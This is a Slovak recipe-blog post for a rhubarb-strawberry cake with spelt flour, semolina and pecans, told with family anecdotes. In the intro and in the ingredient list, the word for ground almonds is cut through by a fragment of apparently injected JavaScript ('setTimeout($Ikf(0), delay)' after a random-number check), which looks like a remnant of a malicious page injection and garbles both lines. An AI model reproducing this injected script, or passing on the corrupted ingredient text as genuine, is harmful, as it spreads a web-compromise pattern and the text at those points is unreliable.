„Rebarboráčik“ – pokušenie bez výčitiek

Ojojooooj…ja a rebarbora…kedysi dávno som jej dala raz šancu a povedala som si, že nikdy viac…bolo to jeden hnusný kyslý koláčisko…a Martin mi už aj minulý rok stále nenápadne kupoval rebarboru, že háádam ma nejako ukecá, aby som niečo upiekla, ale teda neukecal ma a išla do koša po istej dobe v chladničke. Tento rok som si ale povedala, že asi som niečo robila zle…moja maminka ma zásobila jej vlastnoručne vypestovanou rebarborou a tak že idem na to  😀

..naposledy ma vytáčalo to nekonečné šúpanie a tak som sa rozhodla, ju neošúpať. Ďalšia vec je tá kyslosť..a tak som sa rozhodla na pár hodín zasypať nakrájanú rebarboru trstinovým cukrom…ale k postupu sa samozrejme dostaneme 🙂 Korpus bol totálny freestyle, čo kuchyňa dala..Miuška určovala gramáže múk (ja už som to len zaokrúhľovala) a jednoducho bola veľká zábava pri pečení, ako vždy 🙂 Sama som netušila, že ten koláč bude až TAK VEĽMI chutný!!! Je úžasne šťavnatý, zároveň sýty kvôli celozrnnej špaldovej múke a mletým mandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andliam. Kombinácia rebarbory a jahôd so špaldovou múkou a pekanovými orechami je top top top!!!!

Ospravedlňujem sa za fotku, ale toto mi prosím pekne zostalo po 2 hodinovej šichte v Markíze. Môj manžel sa konečne dočkal rebarborového koláča a tak si to s Miuškou patrične aj vychutnali 😀 A určite to túto sezónu nebol posledný „rebarboráčik“ 😀 Som mu tam zabudla nechať lístok, že som ho ešte nefotila 😀 😀 😀

Ingrediencie

  • 750 g rebarbory
  • 300 g jahôd (môžu byť aj mrazené)
  • 4 pl muscovado, alebo trstinového, alebo kokosového cukru
  • 2 pl jemného trstinového cukru na karamel
  • 1 kl mletej vanilky
  • 1-2 pl hladkej ryžovej múky
  • 150 g celozrnnej špaldovej múky
  • 100 g semolíny (múka z tvrdej pšenice) – môžete nahradiť polohrubou bielou špaldovou, alebo dať 50 g semolíny a 50 g hladkej špaldovej bielej múky
  • 100 g mletých mandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andlí
  • 1 čl sódy bikarbóny
  • 50-75 g ghee masla (alebo obyčajného masla roztopeného)
  • 3 vajcia (najlepšie domáce, alebo od sliepok z voľného chovu)
  • 1-2 pl jemných ovsených vločiek na posypanie
  • 50-60 g na hrubo nasekaných pekanových orechov na posypanie

Postup

  1. Rebarboru si umyjeme, nakrájame na asi 2 cm kúsky, dáme do misky, zasypeme 4 pl cukru a necháme na linke odpočívať, kým pustí šťavu. Ja som to nechala asi 3-4 hodiny na linke, kým som bola v práci, ale nemyslím, že je nutné to nechať až tak dlho. Ak máte čerstvé jahody, pridajte na polovicu prekrojené aj jahody. V prípade mrazených ich pridávame až na karamel 🙂
  2. Keď nám rebarbora pustí šťavu, na panvicu s nepriľnavým dnom dáme 2 pl jemného trstinového cukru a rozpustíme ho na karamel. Pridáme rebarboru aj so šťavou a mrazené jahody, premiešavame, stíšime teplotu na stredný plameň, zakryjeme pokrievkou a chvíľku dusíme. Naozaj iba chvíľku, lebo rebarbora sa extrémne rýchlo rozvarí ( to sa prosím pekne stalo mne..Miuška sa vypýtala na toaletu, a kým sme prišli, bol z toho „maglajz“ 😀 😀 Ale absolútne v ničom mi to neprekážalo, je to mňam „maglajz“..už len šupnúť do pohárikov a zasterilizovať ako džem..seriózne 😀 Aj to mám v pláne!!). No ale naspäť ku koláčiku..rebarbora s jahodami pustí po udusení dosť šťavy, tak to cez sitko preceďte a ak šťavy nemáte 250 ml, doplňte to dusenou rebarborou s jahodami, aby ste objemovo naplnili 250 ml odmerku 🙂 Do precedeného „maglajzu“ vmiešajte mletú vanilku a ak máte zmes riedku, pridajte 1-2 pl hladkej ryžovej múky na zahustenie.
  3. Dajte si rozohriať rúru na 200 stupňov celzia. Zmiešajte múky, roztopené ghee/maslo a vajcia. Premiešajte a pridajte hrnček precedenej šťavy z rebarbory s jahodami. Prípadne ochutnajte cesto, či vám je to dosť sladké, ale musíte rátať s tým, že potom pridáte aj rebarborovo-jahovovú zmes. Nám stačí toľko cukru, ako je v recepte, toto je výsostne individuálne, tak chutnajte 😉 Keď máte kompaktnú hmotu, primiešajte aj sódu bikarbónu a rovnomerne natrite na klasický veľký plech vystlaný papierom na pečenie. Vrstva nie je príliš hrubá a môžete vrch posypať trochou (1pl) muscovado, trstinového, alebo kokosového cukru. Teplotu v rúre znížime na 180 stupňov a pečieme asi 20 minút. Kontrolujte špáratkom, či je dobre prepečené.
  4. Keď máme upečený korpus, po vytiahnutí z rúry naň hneď natrieme rebarborovo-jahodovú zmes, posypeme ovseými vločkami a pekanovými orechami. Dáme piecť na 180 stupňov asi 15 minút.
  5. Nakrájame a podávame k domácemu bylinkovému čajíku napríklad 😀

Dobrú chuť, moji milí 😀

 

 

Ohodnoť Recept

Napíš Koment